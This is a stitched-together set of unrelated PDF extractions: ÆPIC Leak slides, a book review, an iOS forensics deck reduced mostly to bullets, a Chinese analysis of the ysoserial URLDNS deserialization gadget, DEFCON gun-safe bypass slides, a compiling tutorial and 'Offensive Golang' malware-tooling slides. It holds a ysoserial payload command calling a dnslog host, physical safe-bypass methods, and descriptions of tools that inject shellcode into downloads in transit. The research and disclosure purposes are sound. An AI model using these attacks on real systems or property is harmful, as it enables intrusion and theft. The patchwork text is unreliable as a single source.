3. Move SSA page out (EWB) and perform Cache Line Freezing
4. Leak via APIC MMIO
5. Move SSA page in (ELDU)
6. Goto 3 until enough confidence
Class
Leakable Registers
General Purpose
rdi r8 r9 r10 r11 r12 r13 r14
SIMD
xmm0-1 xmm6-9
22
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Mitigation
• Recommend to disable APIC MMIO
24
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Mitigation
• Recommend to disable APIC MMIO
• Microcode update to flush SQ on SGX transitions
24
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Mitigation
• Recommend to disable APIC MMIO
• Microcode update to flush SQ on SGX transitions
• Disable hyperthreading when using SGX
24
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Timeline
Dec 7, 2021
Dec 8, 2021
Dec 22, 2021
Jun 14, 2022
Aug 9, 2022
Aug 10, 2022
Discover
ÆPIC Leak
Disclose the
first PoC to
Intel
Intel
confirms the
issue:
embargo
until August
9th, 2022
Intel
publishes
their own
research on
MMIO
leakage
ÆPIC Leak
public
Release
BH USA
talk
25
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Conclusion
• ÆPIC Leak: the first architectural CPU vulnerability that leaks
data from cache hierarchy
• Does not require hyperthreading
• 10th, 11th and 12th gen Intel CPUs affected
aepicleak.com
26
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Virtualized Environments
• APIC is a sensitive component not exposed to VMs
• We found no hypervisor that maps the APIC directly to the
VM
• Virtualized environments are safe from ÆPIC Leak
27
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert) | pdf |
Oath Betrayed: Torture, Medical Complicity, and the War on Terror
by Steven H. Miles, M. D. (Random House. New York. 2006)
Reviewed by Richard Thieme
ThiemeWorks
PO Box 170737
Milwaukee WI 53217-8061
414 351 2321
[email protected]
www.thiemeworks.com
number of words in the body of the review: 765
We all come to big issues like torture and terror from our own biographies. We cannot be
dispassionate when compelled to reflect on horrific events that cause cognitive
dissonance or worse. So let me begin this review with a conversation over a cup of coffee
in Washington DC, earlier this year.
I met Steven Miles in a restaurant before this book was published. Miles is a soft-spoken
physician from Minneapolis, MN, where he is a Professor of Medicine at the University
of Minnesota Medical School and a faculty member of the Center for Bioethics. He looks
and sounds quintessentially professorial, with a pleasant smile and an easy manner.
Yet our conversation was almost conspiratorial in tone, even though the 35,000
documents Miles consulted for this book were in the pubic domain, thanks to the ACLU
and FOIA. Nothing we discussed was really a secret. But Miles had had to discover the
meaning of links between documents for himself, connecting the dots from document to
document (the documents in were separate files, the connections between them not easily
searchable by software.) He had to correlate the movements of military physicians with
diverse places and events.
As he discussed his research, outrage and rage burned through Miles’ restrained
demeanor. He described how doctors had aided and abetted torture in Iraq, Guantanamo,
and other places, some still hidden from view.
That our conversation about documents in the public domain in a public place should feel
conspiratorial is a tip-off to what it does to us to enter the world of this book. We were
not being paranoid—we were experiencing the impact of confronting what is being done
in the name of the war on terror and in our name as Americans in a secret world.
Researchers like Miles often show the effects of “secondary trauma,” a therapist told me,
alerting me to my own symptoms. Immersing oneself in this world results in predictable
consequences. We become obsessed with the truth, an elusive quarry under any
conditions, and our moral framework skews toward the binary. In the face of traumatic
events, whether experienced first or second hand, evil seems easy to distinguish from
good.
Whether it is a conversation in a restaurant or the experience of reading this book – that’s
what can happen.
“I am often asked if my life is in danger, because of this research,” Miles told me. “That’s
an epiphenomenon of being a torturing society. A torturing society is a society that is
abraded by the process of dehumanization. In that process, we essentially create our own
mirrored netherworlds.”
The distortion of our thinking, our behavior, our moral compass, as our society justifies,
rationalizes, and minimizes the impact of engaging in state torture is inevitable.
That is the deeper subtext of Miles’ book, which documents and illuminates how some
doctors have kept prisoners alive as they are tortured and interrogated and have falsified
death certificates to substitute natural causes for torture as the cause of death. Oath
Betrayed shows how the oath sworn by doctors to do no harm is turned on its head in the
name of fighting terror.
This book is a plea for justice, an attempt to reinforce the reasons why America rejected
torture in the past as ineffective and inhumane for both practical and moral reasons. Miles
believes that a society which allows discourse about such events will be affected for the
better as consciences are quickened and resolve strengthened. The existence of this book
is an act of hope and affirmation.
Miles also knows that discussing these issues does not expose him to the risks faced by
colleagues in other countries, who have been tortured themselves or killed for speaking
out. He knows that we still have relative freedom of speech. But for freedom of speech to
be more than a bleeder valve, it must lead to action. In a society saturated with fictional
and non-fictional accounts of violence and torture, we have been desensitized to the
reality that Miles urges us to confront. It is not easy to read this book. Miles asks that we
swim in the deeper waters of the moral, ethical and psychological consequences of our
policies and practices, that we understand what it does to us to become a torturing
society. Unlike screen violence, he does not do so to produce a vicarious shiver, but so
that we will re-examine the thinking that led us to such practices in the first place.
# # #
Richard Thieme is an author and professional speaker focused on the social and cultural
implications of technology, religion, and science. | pdf |
2
3
4
5
6
•
•
•
•
•
•
•
7
Where do
the apps
store data?
Is data
cached in
multiple
places?
Is data
encrypted
on the
device?
Is the
message
recoverable
?
Is
supporting
evidence
present?
8
9
10
11
12
iTunes / API Can Access
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
•
•
•
•
•
•
•
28
29
30
31
32
33
34
35
•
•
•
•
•
•
•
•
•
•
•
•
36
•
•
•
•
•
•
•
•
•
•
•
•
•
•
37
•
•
•
•
•
38
•
•
•
•
•
•
•
•
•
•
39
•
•
•
•
•
•
•
•
•
•
•
•
•
40
41
42
•
•
•
•
•
•
•
•
•
•
43
•
•
•
•
•
•
•
•
•
•
•
•
•
44
•
•
•
•
•
•
•
•
•
•
•
•
45
46
47
•
•
•
•
•
•
•
•
48
•
•
•
•
•
•
•
•
•
• | pdf |
URLDNS
ysoserial
首先是关于ysoserial项目,牛逼就完事了。
序列化的过程
1. 首先使用 ysoserial 生成反序列化文件,然后自行编写反序列流程,触发构造链。
踩坑:不要使用powershell生成,反序列化过程中会报错
2. 反序列化 bin 文件,触发 gadget :
3. 触发请求:
4. 然后查看urldns中gadget的生成过程:ysoserial入口文件位于: ysoserial.GeneratePayload ,
URLDNS文件: ysoserial.payloads.URLDNS
java -jar ysoserial-master-d367e379d9-1.jar URLDNS "http://0hymwn.dnslog.cn" >
urldns.bin
public Object getObject(final String url) throws Exception {
//Avoid DNS resolution during payload creation
//Since the field <code>java.net.URL.handler</code> is transient,
it will not be part of the serialized payload.
URLStreamHandler handler = new SilentURLStreamHandler();
HashMap ht = new HashMap(); // HashMap that will contain the URL
URL u = new URL(null, url, handler); // URL to use as the Key
5. 首先创建一个 SilentURLStreamHandler 对象,且 SilentURLStreamHandler 继承自
URLStreamHandler 类,然后重写了 openConnection 和 getHostAddress 两个方法,这一步的作
用留待后面进一步讲解,此处还有一个关于反序列化的知识点。
6. 接着创建一个 hashmap ,用于之后存储。
7. 创建一个 URL 对象,此处需要跟进 URL 类查看类初始化会发生啥。传递三个参数
(null,url,handler)
ht.put(u, url); //The value can be anything that is
Serializable, URL as the key is what triggers the DNS lookup.
Reflections.setFieldValue(u, "hashCode", -1); // During the put
above, the URL's hashCode is calculated and cached. This resets that so the next
time hashCode is called a DNS lookup will be triggered.
return ht;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(URLDNS.class, args);
}
/**
* <p>This instance of URLStreamHandler is used to avoid any DNS
resolution while creating the URL instance.
* DNS resolution is used for vulnerability detection. It is important
not to probe the given URL prior
* using the serialized object.</p>
*
* <b>Potential false negative:</b>
* <p>If the DNS name is resolved first from the tester computer, the
targeted server might get a cache hit on the
* second resolution.</p>
*/
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException
{
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
8. 通过初始化,会调用handler的parseURL方法对传入的url进行解析,最后获取到host,protocol
等等信息。
9. 之后数据存储,这一步将创建的 URL 对象 u 作为键, url 作为值存入 hashmap 当中。
10. 利用反射将 URL 对象的 hashcode 值设置为-1,此处为什么要重新赋值,之后再说。
11. 返回这个 hashmap 对象,并对这个 hashmap 对象进行序列化。
反序列化的过程
1. 因为序列化的是 hashmap 对象,所以此处反序列化首先跟踪进入 hashmap 类的 readObject 方法
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
// Read in the threshold (ignored), loadfactor, and any hidden stuff
在第1402和1404行会将 hashmap 中的键和值都取出来反序列化,还原成原始状态。此处的 key 根据之
前 payload 生成的过程,是 URL 的对象, value 是我们传入的 url 。
2. 之后调用 putval 方法重新将键值存入 hashmap 当中。此处,需要计算 key 值的 hash ,所以我们
跟进 hash 函数。
可以看到此处需要调用对象 key 当中的 hashcode 方法,而这个 key 跟进上一步的解释是创建的
URL 类的一个对象,所以此处调用的就是 URL 类中的 hashCode 方法。
s.defaultReadObject();
reinitialize();
if (loadFactor <= 0 || Float.isNaN(loadFactor))
throw new InvalidObjectException("Illegal load factor: " +
loadFactor);
s.readInt(); // Read and ignore number of buckets
int mappings = s.readInt(); // Read number of mappings (size)
if (mappings < 0)
throw new InvalidObjectException("Illegal mappings count: " +
mappings);
else if (mappings > 0) { // (if zero, use defaults)
// Size the table using given load factor only if within
// range of 0.25...4.0
float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
float fc = (float)mappings / lf + 1.0f;
int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
DEFAULT_INITIAL_CAPACITY :
(fc >= MAXIMUM_CAPACITY) ?
MAXIMUM_CAPACITY :
tableSizeFor((int)fc));
float ft = (float)cap * lf;
threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
(int)ft : Integer.MAX_VALUE);
@SuppressWarnings({"rawtypes","unchecked"})
Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
table = tab;
// Read the keys and values, and put the mappings in the HashMap
for (int i = 0; i < mappings; i++) {
@SuppressWarnings("unchecked")
K key = (K) s.readObject();
@SuppressWarnings("unchecked")
V value = (V) s.readObject();
putVal(hash(key), key, value, false, false);
}
}
}
3. 继续跟进 URL 类的 hashCode 方法。
此处如果 hashCode 为-1,则进入第885行,之前我们序列化时通过反射将 hashCode 已经设置为-1
了,所以进入第885行。
4. 跟进 handler 对象的 hashCode 方法,此处 handler 对象( URLStreamHandler 类)
此处关于handler的来源存在一个疑问,通过反射查看到handler是 URLStreamHandler 的一个对
象。
5. 继续通过 URLStreamHandler 类的 hashCode 方法计算 hashcode 值:
在第359行调用 getHostAddress 方法,去获取 URL 对象的 IP 地址。也就是发起一次 DNS 请求,
去获取 HOST 对应的 IP 地址。到此,整个构造链已经跟踪完毕。
6. 简单总结一下:首先是反序列进入 hashmap.readObject() -> hashmap.hash() -
> URL.hashCode() -> URLStreamHandler.hashCode() -
> URLStreamHandler.getHostAddress()
几处踩坑和知识点
1. 第一个为什么生成序列化流的时候要通过反射将 hashCode 的值设为-1。因为 hashmap 在进行数据
存储的过程中调用 putVal 函数,这其中会进行 hashcode 的计算,经过计算之后原本初始化的-1
会变成计算后的值,所以要通过反射再次修改值。
在序列化流的生成位置,也可以通过反射来查看hashCode中间的变化。
2. 第二个就是关于为什么要重写那两个方法的问题,以及被transient修饰的属性不参与反序列化。
此处关于transient关键字,做一个简单的实验就可以知道:
创建一个Person类,然后定义一个transient关键字修饰的obj属性。
之后对Person类进行序列化和反序列化,查看结果:
此处可以看到obj对象没有被序列化,并且此处还有一个点就是反序列化的过程中并不会再触发构
造函数。
在一个就是关于函数重写的问题,还是和hashmap存数据的时候会计算一次hashcode有关,在
hashmap存数据的时候会计算URL对象的hashcode值,也就是会调用URL.hashCode()方法,这样
的化按照之前的分析就会发起一次DNS请求,所以为了屏蔽这个请求我们将用于发起请求的两个关
键方法重写,跳过请求部分。
3. 这个构造链的利用在之后CC6的链中也有相同的部分,通过计算 hashcode 触发构造链。 | pdf |
DEFCON 20
SAFES AND CONTAINERS –
INSECURITY DESIGN EXCELLANCE
DESIGN DEFECTS IN SECURITY
PRODUCTS THAT HAVE REAL
CONSEQUENCES IN
PROTECTING LIVES AND
PROPERTY
GUN SAFES: A CASE STUDY
♦ GUN SAFES AND PROPERTY SAFES
ARE SOLD TO STORE WEAPONS
♦ MANY ARE NOT SECURE
♦ ANALYSIS OF INSECURITY
– Boltworks and mechanism
– Biometrics
– Key Locks
SECURITY REPRESENTATIONS
♦ SECURE FOR STORING WEAPONS
♦ CERTIFIED BY CALIFORNIA DOJ
♦ PROTECT KIDS FROM GUNS
MANUFACTURERS, SECURITY,
and ENGINEERING
♦ Many manufacturers do not understand
bypass techniques
♦ Many imports, no security, just price
♦ Large reputable companies sell junk
♦ Representations that are not true by:
– Manufacturers
– Dealers
– Retail
INSECURITY ENGINEERING:
A DEFINITION
♦ Intersection of mechanical and security engineering
♦ Must have both mechanics and security
♦ Must understand bypass techniques and design against at
all stages in process
♦ Develop a new way of thinking by Manufacturers
♦ Problem: Engineers know how to make things work
but not how to break them
MYTHS ABOUT SECURITY AND
PRODUCT DESIGN
♦ It is patented
♦ Engineers think the product is secure
♦ Product has been sold for many years
♦ No known bypass tools or techniques
♦ Product meets or exceeds standards
♦ Testing labs have certified the product
♦ Government labs say its secure
♦ No consumer complaints
STANDARDS: THE PROBLEM
♦ MEET ALL STANDARDS BUT THE LOCK OR
SAFE CAN BE EASILY OPENED
– Standards are not up-to-date
– Not test for many methods of attack
– Consumer relies on standards for security
– Just because you meet standards does not mean
the lock or safe is secure
♦ STANDARDS CAN MISLEAD THE PUBLIC
♦ GUN LOCK AND SAFE STANDARDS ARE
INADEQUATE AND DO NOT PROTECT
CALIFORNIA DOJ STANDARDS
ESSENTIALLY WORTHLESS
REGULATORY GUN SAFE
STANDARDS - CAL DOJ
Section 977.50 of the CA Code of Regulations
♦ Shall be able to fully contain firearms and provide for their
secure storage;
♦ Shall have a locking system consisting of at minimum a
mechanical or electronic combination lock. The
mechanical or electronic combination lock utilized by the
safe shall have at least 10,000 possible combinations
consisting of a minimum three numbers, letters, or
symbols. The lock shall be protected by a case-hardened
(Rc 60+) drill-resistant steel plate, or drill-resistant
material of equivalent strength;
CAL DOJ STANDARDS:
BOLTWORK
♦ Boltwork shall consist of a minimum of
three steel locking bolts of at least ½ inch
thickness that intrude from the door of the
safe into the body of the safe or from the
body of the safe into the door of the safe,
which are operated by a separate handle and
secured by the lock;
CAL DOJ STANDARDS:
CONSTRUCTION
♦ Shall be capable of repeated use. The
exterior walls shall be constructed of a
minimum 12-gauge thick steel for a single-
walled safe, or the sum of the steel walls
shall add up to at least .100 inches for safes
with two walls. Doors shall be constructed
of a minimum of two layers of 12-gauge
steel, or one layer of 7-gauge steel
compound construction;
CAL DOJ STANDARDS:
DOOR HINGES
♦ Door hinges shall be protected to prevent
the removal of the door. Protective features
include, but are not limited to: hinges not
exposed to the outside, interlocking door
designs, dead bars, jewelers lugs and
active or inactive locking bolts.
STANDARDS:
NOT REAL-WORLD TESTS
♦ Standards do not protect consumers
♦ No testing of covert entry and mechanical
bypass techniques
♦ Not real-world testing, aka kids
♦ Lowest common denominator for testing
criteria was adopted for standards
♦ Allows certification of gun safes that can be
opened in seconds by kids
♦ Most states rely on California as Model
SMALL GUN SAFES:
MAJOR RETAILERS
RETAILERS DONT KNOW AND DONT
CARE: ITS ALL ABOUT MONEY
♦ Contacted four major retailers to warn
♦ Only one was even concerned
♦ No action taken by any of them
♦ Stack-On: Absolutely no interest
MISREPRESENTATIONS
ABOUT SECURITY
♦ California DOJ Certified
♦ Can be relied upon as secure
♦ Are safe to secure guns
♦ Cannot be opened by kids
♦ Only way to open: breaking
♦ Can be relied upon by consumer
♦ TSA Approved
DEALERS MISLEAD THE
PUBLIC ABOUT SECURITY
EDDIE RYAN OWENS
11/27/06 - 09/15/2010
DETECTIVE OWENS CASE:
Clark County Sheriffs Office
♦ 2003, Deputy’s son shot 10-year old sister
with service weapon
♦ Sheriffs office mandated all personnel use
gun safes at home and office
♦ Purchased for $36 each from Stack-On;
several hundred units. State purchased
thousands of them
♦ Mandated use for weapons at home and
office and storage of evidence
STACK-ON SAFE FOR
SHERIFFS DEPARTMENT
♦ UC Agent Eddie Owens had weapon in
mandated safe in bedroom closet
♦ September 15, 2010, safe is accessed by
child
♦ Three-year-old Eddie Ryan is shot and dies
♦ Investigation clears father
♦ Father is fired 14 months later for speaking
up about defective safes
♦ Other deputies complain as well
CRIMINAL INVESTIGATION
♦ NO DNA TESTS
♦ NO GSR TESTS ON VICTIM OR SISTER
♦ NO FORENSIC ANALYSIS OF SAFE
♦ NO EXPERTISE BY LOCAL LAB
♦ NO UNDERSTANDING OF HOW THE
SAFE WAS OPENED
♦ DONT KNOW WHO FIRED THE
WEAPON, ALTHOUGH 11-YEAR OLD
SISTER CONFESSED
SECURITY LABS INVOLVEMENT
FORENSIC INVESTIGATION
♦ Examined two safes from same batch;
♦ Analyzed bolt mechanism, solenoid;
♦ High speed video from inside of safe to
document the problem;
♦ Analyzed similar safe from AMSEC,
GUNVAULT, and BULLDOG;
♦ Contacted STACK-ON
♦ Expanded inquiry to all STACK-ON
models
STACK-ON SAFE:
FROM SAME BATCH
INTERNAL MECHANISM:
THE DEFECTIVE DESIGN
HOW A THREE YEAR OLD
CAN OPEN A SAFE
AMSEC DIGITAL:
SAME DEFECTIVE DESIGN
OUR INVESTIGATION
♦ FOUR MANUFACTURERS: AMSEC,
STACK-ON, GUNVAULT, BULLDOG
ANALYZED 10 SAFES:
All Defective Security Designs
♦ SECURITY DESIGNS
– Push-Button keypad lock
– Fingerprint swipe reader biometric
– Fingerprint image reader biometric
– Multi-Button combination
– Key bypass: wafer or tubular lock
♦ ALL COULD BE BYPASSED EASILY
♦ NO SPECIAL TOOLS OR EXPERTISE
BYPASS TECHNIQUES
♦ COVERT ENTRY METHODS: NONE
COVERED BY DOJ STANDARDS
♦ Shims
♦ Straws from McDonalds
♦ Screwdrivers
♦ Pieces of brass from Ace Hardware
♦ Paperclips
♦ Fingers
STACK-ON PC 650
STACK-ON PC 650:
METHODS OF ATTACK
REMOVE RUBBER COVER
ACTIVATE LATCH
EASY LATCH ACCESS
BYPASS PROGRAM BUTTON
RE-PROGRAM THE CODE
SHIM THE WAFER LOCK
STACK-ON PDS 500 SAFE
MAKE A HOLE AND
MANIPULATE MECHANISM
BYPASS SOLENOID WITH WIRE
WAFER LOCK BYPASS
SHIMS AND PAPER CLIPS
STACK-ON BIOMETRIC
FALSE PERCEPTION OF SECURITY
♦ FINGERPRINT READERS DONT
MEAN SECURITY
FINGERPRINT READER AND
WAFER LOCK = SECURITY
FINGERPRINT READER
MODULAR MECHANISM
PUSH THE READER AND
DISLODGE THE MODULE
ACCESS THE SOLENOID
WIRE OPENS THE SAFE
STACK-ON QAS 1200B
BIOMETRIC SAFE
QAS 1200-B BIOMETRIC SAFE
OPEN WITH PAPERCLIP
THE STACK-ON DESIGN
GLUE = STACK-ON SECURITY
HIGH-TECH TOOL TO OPEN:
PAPERCLIP
OPENING THE QAS 1200-B
STACK-ON QAS-710
STACK-ON QAS-710
♦ MOTORIZED MECHANISM
♦ ELECTRONIC KEYPAD
– Open with straw from McDonalds
– Open with brass shim
– Open with Screwdriver
– Reprogram the combination by accessing the
reset switch
OPENING THE STACK-ON
QAS-710 ELECTRONIC SAFE
GUNVAULT GV2000S
OPEN THE GUNVAULT
BULLDOG BD1500
OPEN THE BULLDOG
COMPETENT SECURITY
ENGINEERING MATTERS
♦ SECURE PRODUCTS
♦ PROTECTION OF ASSETS, LIVES, AND
PROPERTY
♦ DEFECTIVELY DESIGNED PRODUCTS
HAVE CONSEQUENCES
♦ LIABILITY
♦ IF YOU HAVE ONE OF THESE SAFES
DefCon 20, July 2012
♦ © Marc Weber Tobias, Tobias Bluzmanis,
and Matthew Fiddler
♦ [email protected]
♦ [email protected]
♦ [email protected] | pdf |
Module 1
A journey from high level languages, through
assembly, to the running process
https://github.com/hasherezade/malware_training_vol1
Creating Executables
Compiling, linking, etc
• The code of the application must be executed by a processor
• Depending on the programming language that we choose, the application may
contain a native code, or an intermediate code
Compiling, linking, etc
• Native languages – compiled to the code that is native to the CPU
MyApp.exe
Native code
Compiling, linking, etc
• Interpreted languages – require to be translated to the native code by an
interpreter
MyApp.exe
Intermediate
code
interpreter
Compiling, linking, etc
• Programming languages:
• compiled to native code (processor-specific), i.e. C/C++, assembly
• with intermediate code (bytecode, p-code): i.e. C# (compiled to Common
Intermediate Language: CIL –previously known as MSIL), Java
• interpreted i.e. Python, Ruby
Compiling, linking, etc
• PowerShell scripts
• Python, Ruby
• Java
• C#, Visual Basic
• C/C++, Rust
• assembly
High level
Low level
abstraction
Compiling, linking, etc
• From an assembly code to a native application:
• Preprocessing
• Assembling
• Linking
MyApp.asm
MyApp.inc
preprocess
assemble
MyApp.obj
link
Used_library.lib
MyApp.exe
Native code
Compiling, linking, etc
• From an assembly code to a native application: demo in assembly
• MASM – Microsoft Macro Asembler
• Windows-only
• YASM – independent Assembler built upon NASM (after development of NASM was
suspended)
• Multiplatform
• YASM has one advantage over MASM: allows to generate binary files (good for writing
shellcodes in pure assembly)
Compiling, linking, etc
• Using YASM to create PE files
• YASM will be used to create object file
• LINK (from MSVC) will be used for linking
yasm –f win64 demo.asm
link demo.obj /entry:main /subsystem:console /defaultlib:kernel32.lib
/defaultlib:user32.lib
Compiling, linking, etc
• Using MASM to create PE files
• MASM will be used to create object file
• LINK (from MSVC) will be used for linking
ml /c demo.asm
link demo.obj /entry:main /subsystem:console /defaultlib:kernel32.lib
/defaultlib:user32.lib
Compiling, linking, etc
• What you write is what you get: the compiled/decompiled code is identical to the
assembly code that you wrote
• Assembly language is very powerful for writing shellcodes, or binary patches
• Generated binaries are much smaller than binaries generated by other languages
Compiling, linking, etc
• From a C/C++ code to a native application:
• Preprocessing
• Compilation
• Assembly
• Linking
MyApp.cpp
MyApp.h
preprocess
compile
assemble
MyApp.obj
link
Used_library.lib
MyApp.exe
Native code
Compiling, linking, etc
• Preprocess C++ file:
• Using MSVC to create PE files
• MSVC compiler: preprocess + compile: create object file
• LINK (from MSVC) used for linking: create exe file
CL /c demo.cpp
LINK demo.obj /defaultlib:user32.lib
CL /P /C demo.cpp
Compiling, linking, etc
• It is possible to supply custom linker, applying executable compression or obfuscation
• Example: Crinkler (crinkler.net)
crinkler.exe demo.obj kernel32.lib user32.lib msvcrt.lib /ENTRY:main
Compiling, linking, etc
• In higher level languages the generated code depends on the compiler and its settings
• The same C/C++ code can be compiled to a differently-looking binary by different
compilers
• Decompiler generated code is a reconstruction of the C/C++ code, but it can never be
identical to the original one (the original code is irreversibly lost in the process of
compilation)
Compiling, linking, etc
• Intermediate languages (.NET)
• Preprocessing
• Compilation to the intermediate code (CIL)
MyApp.cs
Module2.cs
preprocess
compile
MyApp.exe
CIL
At process runtime
Native code
JIT
.NET framework
• In case of .NET part of the compilation is done once the executable is run (JIT – Just-In-
Time)
• CLR (Common Language Runtime)
• contains: JIT compiler (translating CIL instructions to machine code), garbage collector, etc
• FCL (Framework Class Library)
• a collection of types implementing functionallity
https://www.geeksforgeeks.org/net-framework-class-library-fcl/
.NET framework
Windows kernel
Kernel mode
Native code
CLR (implemented as a COM DLL server)
DLL libraries of Windows
MyApp.exe (.NET)
FCL components (DLL libraries)
Managed code
Based on: „Windows Internals Part 1 (7th Edition)”
Exercise
• Compile supplied examples from a commandline, with steps divided (separate compiling
and linking).
• In case of C files, see the generated assembly
• In case of assembly and C, see the OBJ files
• See the final executables under dedicated tools:
• PE-bear
• dnSpy
• Notice, that files written in assembly are much smaller, and contain exactly the code that
we wrote | pdf |
Offensive Golang
Bonanza
Writing Golang Malware
Ben Kurtz @symbolcrash1 [email protected]
Introductions
First Defcon talk 16 years ago
Host of the Hack the Planet podcast
All kinds of random projects
Enough about me, we’ve gotta hustle
What We’re Doing
Easy Mode: Listen along and you’ll get a
sense of the available Golang malware
components
Expert Mode: Follow the links to code
samples, interviews, and all kinds of
other stuff; learn how to make/detect
Golang malware
Agenda
Binject Origin & Why Golang is cool
Malware Core Components
Exploitation Tools
EDR & NIDS Evasion Tools
Post-exploitation Tools
Complete C2 Frameworks
Long, long ago…
I got interested in anti-censorship
around an Iranian election, took a look
at Tor’s obfsproxy2 and thought I could
do better
Started the Ratnet project*, decided to
use that as an excuse to learn Golang
*this comes up later
Golang is Magic
Everything you need comes in the stdlib
Crypto, Networking, FFI, Serialization, VFS
Or is built into the compiler||runtime
Cross-compiler, Tests, Asm, Threads, GC
3rd Party library support is unparalleled
Rust is years away, but what we did is a guide
Golang is Magic
Main Reason I love Go:
It’s the fastest way to be done
Fastest way to learn Go:
golang.org/doc/effective_go
Go Facts
Not interpreted, statically compiled
~800k Runtime compiled in
Embedded assembly language based on Plan9’s
assembler, lets you do arbitrary low-level
stuff without having to use CGO or set up
external toolchains.
Go Assembly Write-up:
https://www.symbolcrash.com/2021/03/02/go-
assembly-on-the-arm64/
So Stuxnet Happened
Everyone gets hot on environmental
keying
Josh Pitts does Ebowla in Golang
All the EDRs write sigs for Ebowla
*cough* the Golang runtime (shared by
all Golang progs)
And then this happens…
Docker
Terraform
py2exe/jar2exe returns
EDRs can’t figure out how to sig Go very
well since it’s statically compiled, and
can’t sig the runtime…
And we already have this sweet
exfiltration thing (Ratnet)…
Start meeting up with other security
people interested in Go and things
escalate quickly…
It’s Go Time!
#golang: the best
place on the internet
Helpful, friendly people writing malware
Binject: capnspacehook, vyrus001, ahhh,
sblip
Others: C-Sto, omnifocal, aus, ne0nd0g,
audibleblink, magnus stubman, + ~500
Donut: thewover, odzhan
Sliver: lesnuages, moloch
Sysop: jeffmcjunkin
Thanks Everyone!
You’re awesome
Offense and Defense
We’re all working security engineers and
red-teamers
The goal here is to communicate a deeper
understanding of what is possible and
how things really work
Everything we’re about to talk about is
open source, so it can be studied for
defense as well
Don’t be an OSTrich
Golang Reversing
Go reversing tools are still somewhat
limited, likely a result of static
compilation requiring manual work (~C)
Gore/Redress: Extracts metadata from
stripped Go binaries, some dependencies,
compiler version
IDAGolangHelper: IDA scripts for parsing
Golang type information
golang_loader_assist: related blog post
Agenda
Binject Origin & Why Golang is cool
Malware Core Components
Exploitation Tools
EDR & NIDS Evasion Tools
Post-exploitation Tools
Complete C2 Frameworks
Binject/debug
Fork of stdlib parsers for PE/Elf/Mach-O
binary formats
We fixed a bunch of bugs and added:
Read/Write from File or Memory
Parse/Modify your own process!
Make changes to executables in code and
write them back out!
This gets used by many of the other tools
github.com/Binject/debug
Binject/debug
Parser entrypoints are always NewFile()
or NewFileFromMemory()
Generator entrypoints are always Bytes()
Added code for relocs, IAT, adding
sections, hooking entrypoints, changing
signatures, etc.
Look at the code coming up for examples!
cppgo
Go’s syscall lets you make calls to a
single ABI, only on Windows
cppgo lets you make calls to any ABI on
any platform! stdcall, cdecl, thiscall
We forked this from lsegal and added
Apple M1 support!
Best example of Go ASM ever
github.com/awgh/cppgo
Agenda
Binject Origin & Why Golang is cool
Malware Core Components
Exploitation Tools
EDR & NIDS Evasion Tools
Post-exploitation Tools
Complete C2 Frameworks
binjection
Tool to insert shellcode into binaries
of any format.
Variety of injection algorithms
implemented.
Extensible.
Uses Binject/debug for parsing and
writing, contains just the injection
code itself.
github.com/Binject/binjection
binjection
Injection Methods:
PE -> Add new section
ELF ->
Silvio Cesare’s padding
infection method (updated for
PIE),
sblip’s PT_NOTE method, and
shared lib .ctors hooking
Mach-O -> One True Code Cave
backdoorfactory
MitM tool that infects downloaded
binaries with shellcode
Josh Pitts's thebackdoorfactory stopped
working sometime in 2016-17, but we
loved it… (he’s updating it again)
Let’s make a new one with a modular
design using these components and
replacing ettercap with bettercap…
bettercap Caplets
download-autopwn comes with bettercap,
already intercepts web downloads and
replaces them with shellcode
Only ReadFile/WriteFile are exposed in
caplet script language
So… we just point those at named pipes
and redirect them to binjection!
backdoorfactory
Starts up a pipe server, spits out a
modified caplet and bettercap config
Tells you what bettercap command to run
Requires configuration of the User-Agent
regexes and file extensions to inject
Put your shellcodes in a directory
structure with .bin extensions
github.com/Binject/backdoorfactory
backdoorfactory
Adds support for unpacking archives
(TGZ,ZIP,etc), injecting all binaries
inside them, and repacking them
Easy to add support for re-signing with
stolen/purchased/generated key
We also ported this to Wifi Pineapple
packages, since Golang supports mips32!
Run it on a malicious AP or on-path
router! (bettercap, backdoorfactory)
Signing from Golang
Once you’ve injected, maybe you want to
re-sign the binary (or just for EDR)
Limelighter - signs EXE/DLL with real
cert or makes one up!
Relic - signs everything!
RPM,DEB,JAR,XAP,PS1,APK,Mach-o,DMG
Authenticode EXE,MSI,CAB,appx,CAT
goWMIExec & go-smb
C-Sto’s goWMIExec brings WMI remote
execution to Go
go-smb2 has full support for SMB copy
operations
Combined, you can do impacket’s
“smbexec” functionality:
Upload or share file with go-smb2
Execute it with goWMIExec
For complete example of smbexec in Go,
see the Source code for the Defcon 29 Workshop:
Writing Golang Malware
Misc Exploitation
gophish - Phishing toolkit
gobuster - Brute-forcer for URIs,
subdomains, open S3 buckets, vhosts
madns - DNS server for pentesters,
useful for XXE exploitation and Android
reversing
modlishka - Phishing reverse proxy/2FA
bypass
Agenda
Binject Origin & Why Golang is cool
Malware Core Components
Exploitation Tools
EDR & NIDS Evasion Tools
Post-exploitation Tools
Complete C2 Frameworks
garble
Replaces the broken gobfuscate
Strips almost all Go metadata
Replaces string literals with lambdas
Works fast & easy w./ Go modules
The only Golang obfuscator you should be
using!
Try it with redress!
github.com/burrowers/garble
Ratnet
Designed to help smuggle data through
hostile networks (custom wire protocol
for NIDS evasion)
Uses pluggable transports:
UDP, TLS, HTTPS, DNS, S3
Store and forward + e2e encryption
Also works offline/mesh
Handheld hardware coming out next year!
github.com/awgh/ratnet
Ratnet
Use Case: Pivot out of an isolated
machine with mDNS/multicast
